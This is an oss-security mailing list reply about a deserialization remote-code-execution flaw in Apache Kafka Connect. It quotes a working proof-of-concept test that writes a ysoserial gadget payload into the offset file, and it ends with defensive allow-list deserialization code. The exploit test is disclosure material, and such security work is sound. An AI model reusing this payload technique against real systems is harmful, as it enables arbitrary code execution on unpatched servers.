Date: Wed, 19 Jul 2017 11:15:13 +0200
From: Salvatore Bonaccorso <carnil@...ian.org>
To: oss-security@...ts.openwall.com
Subject: Re: CVE-IDs request for Apache Kafka deserialization vulnerability via runtime

On Wed, Jul 19, 2017 at 09:41:16AM +1000, Hooman Ghasem Broujerdi wrote:
> Hi,
> 
> Apache Kafka connect-api runtime contains a deserialization vulnerability via
> FileOffsetBackingStore
> which leads to remote code execution; this can be exploited reliably in
> JDK1.7.0_05. Below is
> a unit test for it:
> 
> 
> import junit.framework.Test;
> import junit.framework.TestCase;
> import junit.framework.TestSuite;
> import org.apache.commons.io.FileUtils;
> import org.apache.kafka.connect.runtime.standalone.StandaloneConfig;
> import org.apache.kafka.connect.storage.FileOffsetBackingStore;
> import ysoserial.payloads.Jdk7u21;
> 
> import java.io.ByteArrayOutputStream;
> import java.io.File;
> import java.io.IOException;
> import java.io.ObjectOutputStream;
> import java.util.HashMap;
> import java.util.Map;
> 
> public void test_Kafka_Deser() throws Exception {
> 
>         StandaloneConfig config;
> 
>         String projectDir = System.getProperty("user.dir");
> 
>         Jdk7u21 jdk7u21 = new Jdk7u21();
>         Object o = jdk7u21.getObject("touch vul");
> 
>         byte[] ser = serialize(o);
> 
>         File tempFile = new File(projectDir + "/payload.ser");
>         FileUtils.writeByteArrayToFile(tempFile, ser);
> 
>         Map<String, String> props = new HashMap<String, String>();
>         props.put(StandaloneConfig.OFFSET_STORAGE_FILE_FILENAME_CONFIG,
> tempFile.getAbsolutePath());
>         props.put(StandaloneConfig.KEY_CONVERTER_CLASS_CONFIG,
> "org.apache.kafka.connect.json.JsonConverter");
>         props.put(StandaloneConfig.VALUE_CONVERTER_CLASS_CONFIG,
> "org.apache.kafka.connect.json.JsonConverter");
>         props.put(StandaloneConfig.INTERNAL_KEY_CONVERTER_CLASS_CONFIG,
> "org.apache.kafka.connect.json.JsonConverter");
>         props.put(StandaloneConfig.INTERNAL_VALUE_CONVERTER_CLASS_CONFIG,
> "org.apache.kafka.connect.json.JsonConverter");
>         config = new StandaloneConfig(props);
> 
>         FileOffsetBackingStore restore = new FileOffsetBackingStore();
>         restore.configure(config);
>         restore.start();
>     }
> 
>     private byte[] serialize(Object object) throws IOException {
>         ByteArrayOutputStream bout = new ByteArrayOutputStream();
>         ObjectOutputStream out = new ObjectOutputStream(bout);
>         out.writeObject(object);
>         out.flush();
>         return bout.toByteArray();
>     }

Thanks for reaching out to the oss-security list. Unfortunately, direct
CVE assignments cannot be requested through the list anymore; rather,
please fill out the form at https://cveform.mitre.org/

Once you have the CVE assigned, can you please follow up with the
assignment in this thread, so that others are informed about it?

Regards,
Salvatore
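The quoted test shows the risk: FileOffsetBackingStore hands the offset file to a plain ObjectInputStream, so whatever class graph the file contains gets instantiated. The defensive counterpart is to resolve only the classes the file is expected to carry. The following is an added example, not code from this thread or from Apache Kafka; it assumes the offset file holds a HashMap<byte[], byte[]> and nothing else, and the class names SafeOffsetReader, AllowListObjectInputStream and readOffsets are this example's own. The resolveClass override works on the JDK 7 mentioned above; on JDK 9 and later (and 8u121+) the platform ObjectInputFilter / jdk.serialFilter mechanism does the same job.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.InvalidClassException;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.ObjectStreamClass;
import java.util.Arrays;
import java.util.Date;
import java.util.HashMap;
import java.util.HashSet;
import java.util.Map;
import java.util.Set;

/** Added example: read a serialized offset map while refusing every class outside a fixed allow-list. */
public class SafeOffsetReader {

    // Assumption: the offset file holds a HashMap<byte[], byte[]> and nothing else.
    private static final Set<String> ALLOWED = new HashSet<>(Arrays.asList(
            "java.util.HashMap",
            "[B"   // JVM name of byte[]
    ));

    /** ObjectInputStream that checks every class descriptor before the class is resolved. */
    static final class AllowListObjectInputStream extends ObjectInputStream {
        AllowListObjectInputStream(InputStream in) throws IOException {
            super(in);
        }

        @Override
        protected Class<?> resolveClass(ObjectStreamClass desc)
                throws IOException, ClassNotFoundException {
            if (!ALLOWED.contains(desc.getName())) {
                // Refuse before loading: an unexpected class in the stream is never instantiated.
                throw new InvalidClassException(desc.getName(), "class not permitted in offset file");
            }
            return super.resolveClass(desc);
        }
    }

    /** Deserialize the offset file contents; throws InvalidClassException on anything unexpected. */
    @SuppressWarnings("unchecked")
    public static Map<byte[], byte[]> readOffsets(byte[] fileContents)
            throws IOException, ClassNotFoundException {
        try (ObjectInputStream in = new AllowListObjectInputStream(new ByteArrayInputStream(fileContents))) {
            Object obj = in.readObject();
            if (!(obj instanceof HashMap)) {
                throw new IOException("offset file did not contain a HashMap: " + obj.getClass().getName());
            }
            return (Map<byte[], byte[]>) obj;
        }
    }

    // Helper used only to build constructed sample input for the demo below.
    static byte[] serialize(Object o) throws IOException {
        ByteArrayOutputStream bout = new ByteArrayOutputStream();
        try (ObjectOutputStream out = new ObjectOutputStream(bout)) {
            out.writeObject(o);
        }
        return bout.toByteArray();
    }

    public static void main(String[] args) throws Exception {
        // Constructed sample: a legitimate offset map round-trips through the reader.
        Map<byte[], byte[]> offsets = new HashMap<>();
        offsets.put("topic-0".getBytes("UTF-8"), "42".getBytes("UTF-8"));
        Map<byte[], byte[]> back = readOffsets(serialize(offsets));
        System.out.println("loaded " + back.size() + " offset entry");

        // Constructed sample: any class outside the allow-list is refused, here a harmless java.util.Date.
        try {
            readOffsets(serialize(new Date()));
            System.out.println("unexpected: Date was accepted");
        } catch (InvalidClassException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

The check sits in resolveClass, which the stream calls for each class descriptor before any instance is created, so a disallowed class is refused before its readObject or any constructor logic can run; the instanceof test after readObject is a second, cheaper guard against a stream whose top-level object is allowed but of the wrong shape.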
